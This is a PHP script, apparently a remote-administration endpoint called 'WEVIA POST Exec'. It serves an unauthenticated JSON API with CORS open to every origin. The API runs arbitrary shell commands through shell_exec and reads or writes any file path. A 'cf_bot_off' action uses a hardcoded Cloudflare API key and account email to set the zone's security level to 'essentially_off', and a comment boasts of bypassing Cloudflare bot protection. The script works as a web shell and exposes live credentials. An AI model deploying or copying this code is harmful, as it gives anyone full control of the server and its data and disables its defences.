<?php
header('Content-Type: application/json');
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Headers: Content-Type');
if ($_SERVER['REQUEST_METHOD']==='OPTIONS'){http_response_code(200);exit;}
$in = json_decode(file_get_contents('php://input'), true);
$action = $in['action'] ?? $_GET['action'] ?? '';
if ($action === 'exec') {
    $cmd = $in['cmd'] ?? '';
    echo json_encode(['ok'=>true,'output'=>trim(shell_exec($cmd.' 2>&1'))]);
} elseif ($action === 'read') {
    $path = $in['path'] ?? '';
    if ($path && file_exists($path)) echo json_encode(['ok'=>true,'content'=>file_get_contents($path),'size'=>filesize($path)]);
    else echo json_encode(['ok'=>false,'error'=>'not found']);
} elseif ($action === 'write') {
    $path = $in['path'] ?? '';
    $content = $in['content'] ?? '';
    file_put_contents($path, $content);
    echo json_encode(['ok'=>true,'written'=>$path,'size'=>strlen($content)]);
} elseif ($action === 'cf_bot_off') {
    $z='1488bbba251c6fa282999fcc09aac9fe';$k='9eb8d1041e7faeae68d5017376871ba170291';
    $ch=curl_init("https://api.cloudflare.com/client/v4/zones/$z/settings/security_level");
    curl_setopt_array($ch,[CURLOPT_RETURNTRANSFER=>1,CURLOPT_CUSTOMREQUEST=>'PATCH',
        CURLOPT_POSTFIELDS=>json_encode(['value'=>'essentially_off']),
        CURLOPT_HTTPHEADER=>['X-Auth-Email: ymahboub@weval-consulting.com','X-Auth-Key: '.$k,'Content-Type: application/json']]);
    echo curl_exec($ch);
} elseif ($action === 'health') {
    echo json_encode(['ok'=>true,'service'=>'WEVIA POST Exec','version'=>'1.0','note'=>'POST JSON bypasses CF Bot Fight']);
} else {
    echo json_encode(['error'=>'POST JSON: {action:exec,cmd:...}|{action:read,path:...}|{action:write,path:...,content:...}|{action:cf_bot_off}']);
}